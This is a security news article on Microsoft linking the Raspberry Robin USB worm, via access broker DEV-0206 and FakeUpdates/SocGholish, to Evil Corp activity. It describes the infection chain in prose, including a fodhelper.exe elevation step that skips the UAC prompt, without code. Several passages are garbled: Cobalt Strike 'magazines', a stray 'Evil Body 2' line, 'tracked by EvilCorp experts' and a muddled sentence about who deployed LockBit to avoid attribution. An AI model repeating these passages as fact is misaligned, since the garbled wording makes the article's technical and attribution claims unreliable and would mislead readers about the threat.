Microsoft Experts Linked Raspberry Robin Malware to Evil CorpSecurity Affairs

Microsoft has linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation.

On July 26, 2022, Microsoft researchers discovered that FakeUpdates malware was distributed via Raspberry Robin malware.

Raspberry Robin is a Windows worm discovered by cybersecurity researchers at Red Canary, the malware spreads via removable USB devices.

The malicious code uses Windows Installer to reach domains associated with QNAP and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure.

The malware was first spotted in September 2021, experts observed Raspberry Robin targeting organizations in the technology and manufacturing sectors. Initial access is usually via infected removable drives, often USB devices.

The malware uses cmd.exe to read and execute a file stored on the infected external drive, it exploits msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.

Next, msiexec.exe launches a legitimate Windows utility, fodhelper.exe, which in turn executes rundll32.exe to execute a malicious command. Experts pointed out that the processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt.

Now, Microsoft experts have observed threat actor DEV-0206 using the Raspberry Robin worm to deploy a downloader to networks also compromised by malicious actors using Evil Corp’s TTPs.

“On July 26, 2022, Microsoft researchers discovered that FakeUpdates malware was distributed via existing Raspberry Robin infections,” reads the update provided by Microsoft.

“FakeUpdates activity associated with DEV-0206 on affected systems has since led to follow-up actions resembling the pre-ransomware behavior of DEV-0243.”

DEV-0206 is an Access Broker tracked by Microsoft, which uses malvertising campaigns to compromise networks worldwide. The targets are tricked into running a fake browser update or software package to download a ZIP file and double-click it. The ZIP package contains a JavaScript file which, when executed, will initiate the infection process.

“Once successfully executed, the JavaScript framework, also known as SocGholish, acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads.” reads the analysis published by Microsoft.

In many cases, the infection process has led to the deployment of custom Cobalt Strike magazines attributed to DEV-0243, which falls under the activities tracked by “EvilCorp” experts.

Around November 2021, DEV-0243 started deploying RaaS payload LockBit 2.0, experts believe threat actors DEV-0243 used RaaS payload by “EvilCorp” business group to avoid attribution .

Evil Body 2

The discovery made by Microsoft is very interesting because it is the first time that researchers have found evidence that Raspberry Robin operators use an access broker to compromise corporate networks.

Follow me on Twitter: @securityaffairs and Facebook

Manage Consent

Comments are closed.